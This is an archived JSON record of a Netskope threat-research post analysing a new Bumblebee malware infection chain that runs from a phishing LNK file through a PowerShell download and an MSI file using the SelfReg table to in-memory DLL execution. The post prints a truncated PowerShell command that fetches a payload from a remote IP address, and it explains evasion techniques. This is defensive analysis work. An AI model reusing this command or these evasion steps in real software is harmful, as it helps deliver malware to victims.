{
	"id": "0f7620d2-3031-4840-87ff-2c253a861d1d",
	"created_at": "2026-04-06T00:08:25.180385Z",
	"updated_at": "2026-04-10T03:24:24.72237Z",
	"deleted_at": null,
	"sha1_hash": "f487973c655ba7c4ce1aa2e3851609192422d5f1",
	"title": "New Bumblebee Loader Infection Chain Signals Possible Resurgence",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 70404,
	"plain_text": "New Bumblebee Loader Infection Chain Signals Possible Resurgence\r\nBy Leandro Fróes\r\nPublished: 2024-10-18 · Archived: 2026-04-05 17:09:35 UTC\r\nSummary\r\nBumblebee is a highly sophisticated downloader malware cybercriminals use to gain access to corporate networks and deliver other payloads such as Cobalt Strike beacons and ransomware. The Google Threat Analysis Group first discovered the malware in March 2022 and named it Bumblebee based on a User-Agent string it used.\r\nThe Netskope Threat Labs team discovered what seems to be a new infection chain leading to Bumblebee malware infection, and our findings corroborate those shared by other researchers.\r\nIn this blog post, we will analyze all the files involved in the chain until the execution of the Bumblebee payload.\r\nKey findings\r\nThis is the first occurrence of a Bumblebee campaign we have seen since Operation Endgame, an operation performed by Europol in May 2024 to disrupt the major malware botnets, such as Bumblebee, IcedID, and Pikabot.\r\nThe infection chain used to deliver the final payload is not new, but this is the first time we have seen it being used by Bumblebee.\r\nThese activities might indicate the resurfacing of Bumblebee in the threat landscape.\r\nInitial infection\r\nThe infection likely starts via a phishing email luring the victim to download a ZIP file and extract and execute the file inside it. The ZIP file contains an LNK file named “Report-41952.lnk” that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns.\r\nLNK and PowerShell again?\r\nThe usage of LNK files is very common in Bumblebee campaigns, either to download the next stage payloads or to directly execute files. In this case, the file is used as a downloader and is responsible for downloading and executing the next stage of the infection chain.\r\nOnce opened, the LNK file executes a PowerShell command to download an MSI file from a remote server, renames it as “%AppData%\\y.msi”, and then executes/installs it using the Microsoft msiexec.exe tool.\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 1 of 11\r\n%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe Invoke-WebRequest \"https:///193.242.145.138/mid/w1/\r\nThe option “/qn” is used to make sure there’s no user interaction needed in this step, making the execution of the LNK file the last step that requires user interaction in the whole chain.\r\nNew MSI approach\r\nUsing MSI files to execute payloads is a very successful technique several adversaries use. Some well-known malware families, such as DarkGate and Latrodectus, are examples of how effective this method can be in both luring users and bypassing defenses.\r\nSimilar to the mentioned cases, the new Bumblebee payload is delivered via MSI files. The analyzed samples are disguised as Nvidia and Midjourney installers. They are used to load and execute the final payload all in memory, without even having to drop the payload to disk, as observed in previous campaigns using ISO files.\r\nRegarding MSI files, most malware, including earlier versions of Bumblebee, use the CustomAction table to specify which steps to execute during the MSI installation. LOLBins, such as rundll32.exe and regsvr32.exe, are commonly used to load malicious DLLs via MSI files, as well as powershell.exe to execute PowerShell scripts, as observed in previous Bumblebee campaigns.\r\nFrom an attacker perspective, the downside of these approaches is that once any of those tools execute, a new process is created, opening the opportunity for defenders to flag unusual events, such as the rundll32 process being created by msiexec. In the analyzed version, Bumblebee uses a stealthier approach to avoid the creation of other processes and avoids writing the final payload to disk.\r\nIt does so by using the SelfReg table to force the execution of the DllRegisterServer export function present in a file in the File table. The entry in the SelfReg table works as a key to indicate what file to execute in the File table, and in our case it was the final payload DLL.\r\nThe mentioned DLL is present in a CAB file named “disk1” and once the MSI installation starts, the DLL is loaded in the msiexec process address space and its DllRegisterServer export function is called, leading to the unpacking and execution of the Bumblebee payload. The following image is an example of the final payload mapped in the memory of the msiexec process.\r\nBumblebee payload\r\nBy analyzing the unpacked payload, we can flag some well-known characteristics of Bumblebee, such as its internal DLL name and exported functions.\r\nThe configuration extraction approach is the same as in the other versions. The malware uses a clear-text hardcoded key as an RC4 key to decrypt the encrypted configuration.\r\nIn the analyzed samples, the key used was the “NEW_BLACK” string. The decrypted port was 443 and the campaign IDs were “msi” and “lnk001”.\r\nThe full analysis of the Bumblebee payload is out of the scope of this blog post. The Netskope Threat Labs team will monitor Bumblebee activities and follow up on the analysis when we have more information.\r\nNetskope Detection\r\nNetskope Advanced Threat Protection provides proactive coverage against this threat.\r\nWin32.Trojan.BumblebeeLNK\r\nWin64.Trojan.BumbleBee\r\nIOCs\r\nAll the IOCs and scripts related to this malware can be found in our GitHub repository.\r\nSource: https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence"
	],
	"report_names": [
		"new-bumblebee-loader-infection-chain-signals-possible-resurgence"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434105,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f487973c655ba7c4ce1aa2e3851609192422d5f1.pdf",
		"text": "https://archive.orkl.eu/f487973c655ba7c4ce1aa2e3851609192422d5f1.txt",
		"img": "https://archive.orkl.eu/f487973c655ba7c4ce1aa2e3851609192422d5f1.jpg"
	}
}